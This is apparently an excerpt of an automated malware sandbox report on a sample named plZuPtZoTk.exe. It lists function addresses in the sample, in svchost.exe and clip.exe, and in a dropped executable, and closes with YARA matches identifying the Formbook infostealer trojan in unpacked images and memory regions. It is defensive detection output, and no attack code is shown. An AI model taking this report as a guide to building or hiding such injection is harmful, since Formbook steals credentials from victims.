            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E7CA70_2_009E7CA7
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E1C770_2_009E1C77
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009F9EEE0_2_009F9EEE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A4BE440_2_00A4BE44
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E1F320_2_009E1F32
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_016E31D80_2_016E31D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181432_2_00418143
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030402_2_00403040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010F02_2_004010F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021DD2_2_004021DD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021E02_2_004021E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9AA2_2_0040F9AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9B32_2_0040F9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012602_2_00401260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163232_2_00416323
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBD32_2_0040FBD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DBF42_2_0040DBF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040238C2_2_0040238C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023902_2_00402390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC532_2_0040DC53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026C02_2_004026C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7232_2_0042E723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E98D804_2_04E98D80
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA14AF4_2_04EA14AF
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AD5F4_2_04E9AD5F
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EB98AF4_2_04EB98AF
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04EA32C94_2_04EA32C9
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AB3F4_2_04E9AB3F
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeCode function: 4_2_04E9AB364_2_04E9AB36
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D24465_2_045D2446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CE4F65_2_045CE4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045205355_2_04520535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E05915_2_045E0591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453C6E05_2_0453C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045447505_2_04544750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045207705_2_04520770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451C7C05_2_0451C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045B20005_2_045B2000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045A81585_2_045A8158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BA1185_2_045BA118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045101005_2_04510100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D81CC5_2_045D81CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E01AA5_2_045E01AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C02745_2_045C0274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045A02C05_2_045A02C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DA3525_2_045DA352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452E3F05_2_0452E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045E03E65_2_045E03E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04520C005_2_04520C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04510CF25_2_04510CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C0CB55_2_045C0CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452AD005_2_0452AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451ADE05_2_0451ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04538DBF5_2_04538DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04520E595_2_04520E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DEE265_2_045DEE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DEEDB5_2_045DEEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04532E905_2_04532E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DCE935_2_045DCE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04594F405_2_04594F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04540F305_2_04540F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04562F285_2_04562F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04512FC85_2_04512FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452CFE05_2_0452CFE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0459EFA05_2_0459EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045228405_2_04522840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452A8405_2_0452A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0454E8F05_2_0454E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045068B85_2_045068B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045369625_2_04536962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045229A05_2_045229A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045EA9A65_2_045EA9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0451EA805_2_0451EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DAB405_2_045DAB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D6BD75_2_045D6BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045114605_2_04511460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF43F5_2_045DF43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D75715_2_045D7571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BD5B05_2_045BD5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D16CC5_2_045D16CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF7B05_2_045DF7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CF0CC5_2_045CF0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045270C05_2_045270C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D70E95_2_045D70E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DF0E05_2_045DF0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0450F1725_2_0450F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045EB16B5_2_045EB16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0455516C5_2_0455516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0452B1B05_2_0452B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453B2C05_2_0453B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045C12ED5_2_045C12ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045252A05_2_045252A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0450D34C5_2_0450D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D132D5_2_045D132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0456739A5_2_0456739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04599C325_2_04599C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFCF25_2_045DFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D1D5A5_2_045D1D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04523D405_2_04523D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D7D735_2_045D7D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453FDC05_2_0453FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04529EB05_2_04529EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFF095_2_045DFF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_044E3FD55_2_044E3FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_044E3FD25_2_044E3FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04521F925_2_04521F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFFB15_2_045DFFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0458D8005_2_0458D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045238E05_2_045238E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045299505_2_04529950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453B9505_2_0453B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045B59105_2_045B5910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFA495_2_045DFA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045D7A465_2_045D7A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04593A6C5_2_04593A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045CDAC65_2_045CDAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04565AA05_2_04565AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045BDAAC5_2_045BDAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045DFB765_2_045DFB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04595BF05_2_04595BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0455DBF95_2_0455DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0453FB805_2_0453FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_003417A05_2_003417A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_003430505_2_00343050
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0035B4505_2_0035B450
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C6E05_2_0033C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C6D75_2_0033C6D7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033A9215_2_0033A921
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033C9005_2_0033C900
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0033A9805_2_0033A980
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00344E705_2_00344E70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E44B5_2_0438E44B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E5635_2_0438E563
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438CC485_2_0438CC48
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438E9055_2_0438E905
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438D9685_2_0438D968
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_0438CBD45_2_0438CBD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0458EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0450B970 appears 275 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04567E54 appears 99 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0459F290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04555130 appears 48 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009DF9F2 appears 40 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009C9CB3 appears 31 times
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: String function: 009E0A30 appears 46 times
            Source: plZuPtZoTk.exe, 00000000.00000003.1462141070.0000000004023000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs plZuPtZoTk.exe
            Source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000041CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs plZuPtZoTk.exe
            Source: plZuPtZoTk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
